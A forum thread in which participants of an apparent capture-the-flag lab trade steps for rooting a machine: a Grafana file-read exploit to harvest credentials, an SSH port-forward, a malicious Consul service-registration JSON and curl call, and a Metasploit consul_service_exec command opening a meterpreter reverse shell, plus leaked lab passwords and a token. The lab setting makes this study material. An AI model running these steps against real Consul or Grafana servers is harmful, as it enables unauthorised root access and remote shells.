Return to forum

saturnodev · October 4, 2022 at 7:31 PM

(October 1, 2022, 11:14 PM)araaraara Wrote: how to rooooooooot

https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/misc/consul_service_exec.md
check this, abusing this service

vuln63 · October 8, 2022 at 11:27 PM

(October 1, 2022, 11:31 PM)yumi Wrote: @Truss46

did you access it remotely? did you get the machine shell already? I'm remotely trying accessing mysql and im receiving the password error message but I'm copying directly from grafana.db.

if you already got the shell on the machine and accessed it locally, you tell me, please, because then I stop trying this and try another way, in fact I'm going to try another path now.

You Get user by exploiting grafana file read exploit get creds by reading grafana datasources than find a base64 encoded password for the developer user to ssh with

kujen5 · October 13, 2022 at 10:46 PM

why do we need to portforward the ssh connection to our localhost in order for the exploit to work?

le0x · October 14, 2022 at 9:48 PM

(October 2, 2022, 01:14 AM)11231123 Wrote: For root create a service config file for consul like:

exp.json:

{
  "name": "pwn",
  "tags": [
    "default"
  ],
  "checks": [
    {
      "CheckId": "lol",
      "name": "lol",
      "args": [
        "/tmp/test.sh"
      ],
      "interval": "10s",
      "timeout": "1s"
    }
  ]
}

Put your payload to /tmp/test.sh

Then just register the service with your token:

curl --header "X-Consul-Token: <token>" --request PUT -T exp.json http://127.0.0.1:8500/v1/agent/service/register

Sorry, where did you get the information about uploading configs to the server using the consul. Please give a link. :-)

r00tx01 · October 28, 2022 at 1:39 PM

(October 2, 2022, 01:14 AM)11231123 Wrote: For root create a service config file for consul like:

exp.json:

{
  "name": "pwn",
  "tags": [
    "default"
  ],
  "checks": [
    {
      "CheckId": "lol",
      "name": "lol",
      "args": [
        "/tmp/test.sh"
      ],
      "interval": "10s",
      "timeout": "1s"
    }
  ]
}

Put your payload to /tmp/test.sh

Then just register the service with your token:

curl --header "X-Consul-Token: <token>" --request PUT -T exp.json http://127.0.0.1:8500/v1/agent/service/register

Thank you for sharing, still figuring it out because this is not triggering the shell for some reason.

bashinjector · November 15, 2022 at 4:31 PM

If anyone gets a problem "Exploit completed, but no session was created" in the metasploit framework:

Try this:

1. ssh -L 8500:0.0.0.0:8500 [email protected]

password: anEnglishManInNewYork027468

2. In a separate tab:

sudo msfconsole -q -x "use multi/misc/consul_service_exec; set payload linux/x86/meterpreter/reverse_tcp;set rhosts 127.0.0.1; set lhost PUT_YOUR_TUN0_IP; set acl_token bb03b43b-1d81-d62b-24b5-39540ee469b5; set lport 8801; exploit"

3. meterpreter > getuid

meterpreter > cd root

meterpreter > cat root.txt

0xcloudy · November 15, 2022 at 11:25 PM

I managed to get admin:messageInABottle685427 but wasn't able to log into the webpage at port 3000. Where can I apply this cred on?